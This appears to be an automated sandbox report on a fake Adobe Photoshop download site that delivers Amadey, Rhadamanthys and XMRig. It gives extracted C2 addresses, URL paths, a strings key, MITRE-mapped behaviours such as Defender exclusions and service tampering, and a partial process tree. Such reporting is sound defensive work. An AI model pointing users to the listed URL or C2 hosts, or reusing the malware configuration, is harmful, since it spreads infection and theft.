amadey | hxxps://www[.]soft-got[.]org/adobephotoshop

Resubmissions

30-01-2025 12:19

250130-phpr9ssqbj 10

31-12-2024 22:15

241231-16gx4svker 10

03-08-2024 16:41

240803-t65kvaygnq 10

03-08-2024 08:45

240803-kn1dqssgqh 10

Analysis

max time kernel
149s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
03-08-2024 08:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.soft-got.org/adobephotoshop

Score

10^/10

amadey rhadamanthys xmrig 9f93a2 discovery evasion execution miner persistence stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

9f93a2

http://185.208.158.116

http://185.209.162.226

http://89.23.103.42

Attributes

install_dir
3bca58cece
install_file
Hkbsse.exe
strings_key
554ac8d4ec8b2a0ead6c958fdfed18cb
url_paths
/hb9IvshS01/index.php

/hb9IvshS02/index.php

/hb9IvshS03/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4596 created 2536	4596	plugin31849	44

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/816-382-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/816-388-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/816-387-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/816-386-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/816-385-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/816-384-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/816-381-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/816-434-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/816-435-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2264	powershell.exe
3776	powershell.exe
944	powershell.exe
4208	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	3plugin13200
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	Launhcer.exe

Executes dropped EXE 14 IoCs

pid	Process
4796	Launhcer.exe
5108	Launcher.exe
4604	wget.exe
1308	winrar.exe
4596	plugin31849
4848	wget.exe
1128	winrar.exe
1772	2plugin28438
3544	wget.exe
1584	winrar.exe
5008	3plugin13200
1832	Hkbsse.exe
3700	kuytqawknxye.exe
4080	Hkbsse.exe

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000002384a-238.dat	upx
behavioral1/memory/1772-265-0x0000000140000000-0x0000000140E40000-memory.dmp	upx
behavioral1/memory/3700-341-0x0000000140000000-0x0000000140E40000-memory.dmp	upx
behavioral1/memory/816-377-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-382-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-388-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-387-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-386-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-385-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-384-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-381-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-378-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-380-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-376-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-379-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-434-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/816-435-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
91	bitbucket.org
92	bitbucket.org
15	bitbucket.org
16	bitbucket.org
88	raw.githubusercontent.com
90	raw.githubusercontent.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4348	powercfg.exe
3316	powercfg.exe
3752	powercfg.exe
2476	powercfg.exe
1448	powercfg.exe
4804	powercfg.exe
1480	powercfg.exe
4332	powercfg.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	2plugin28438
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	kuytqawknxye.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
1772	2plugin28438
1772	2plugin28438
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3700 set thread context of 4348	3700	kuytqawknxye.exe	229
PID 3700 set thread context of 816	3700	kuytqawknxye.exe	230

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Hkbsse.job	3plugin13200

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1132	sc.exe
2952	sc.exe
1640	sc.exe
1512	sc.exe
432	sc.exe
4760	sc.exe
2104	sc.exe
408	sc.exe
5012	sc.exe
2980	sc.exe
4908	sc.exe
4420	sc.exe
4008	sc.exe
1320	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 22 IoCs

pid	pid_target	Process	procid_target
4324	4596	WerFault.exe	121
2104	5008	WerFault.exe	134
4612	5008	WerFault.exe	134
3680	5008	WerFault.exe	134
4624	5008	WerFault.exe	134
2024	5008	WerFault.exe	134
408	5008	WerFault.exe	134
2396	5008	WerFault.exe	134
388	5008	WerFault.exe	134
3392	5008	WerFault.exe	134
4908	1832	WerFault.exe	151
1336	1832	WerFault.exe	151
4472	1832	WerFault.exe	151
4676	1832	WerFault.exe	151
4848	1832	WerFault.exe	151
432	1832	WerFault.exe	151
2524	1832	WerFault.exe	151
944	1832	WerFault.exe	151
388	1832	WerFault.exe	151
2392	1832	WerFault.exe	151
4676	1832	WerFault.exe	151
3444	4080	WerFault.exe	237

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launhcer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3plugin13200
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	plugin31849
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4604	wget.exe
4848	wget.exe
3544	wget.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 51 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dwm.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
672	chrome.exe
672	chrome.exe
4208	powershell.exe
4208	powershell.exe
4208	powershell.exe
2264	powershell.exe
2264	powershell.exe
2264	powershell.exe
4596	plugin31849
4596	plugin31849
1400	openwith.exe
1400	openwith.exe
1400	openwith.exe
1400	openwith.exe
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
3776	powershell.exe
3776	powershell.exe
3776	powershell.exe
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
1772	2plugin28438
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
944	powershell.exe
944	powershell.exe
944	powershell.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
3700	kuytqawknxye.exe
816	dwm.exe
816	dwm.exe
816	dwm.exe
816	dwm.exe
816	dwm.exe
816	dwm.exe
816	dwm.exe
816	dwm.exe
816	dwm.exe
816	dwm.exe
816	dwm.exe
816	dwm.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
672	chrome.exe
672	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe
Token: SeShutdownPrivilege	672	chrome.exe
Token: SeCreatePagefilePrivilege	672	chrome.exe

Suspicious use of FindShellTrayWindow 56 IoCs

pid	Process
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
4604	wget.exe
1308	winrar.exe
1308	winrar.exe
4848	wget.exe
1128	winrar.exe
1128	winrar.exe
3544	wget.exe
1584	winrar.exe
1584	winrar.exe
5008	3plugin13200
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe
672	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 672 wrote to memory of 1764	672	chrome.exe	89
PID 672 wrote to memory of 1764	672	chrome.exe	89
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 4544	672	chrome.exe	90
PID 672 wrote to memory of 680	672	chrome.exe	91
PID 672 wrote to memory of 680	672	chrome.exe	91
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92
PID 672 wrote to memory of 2912	672	chrome.exe	92

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2536
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.soft-got.org/adobephotoshop
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbfecbcc40,0x7ffbfecbcc4c,0x7ffbfecbcc58
  2⤵
  PID:1764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1876,i,13477801979242511814,17417431625219028360,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1872 /prefetch:2
  2⤵
  PID:4544
- C:\Program Files\Google\Chrome\Application\chrome.exe
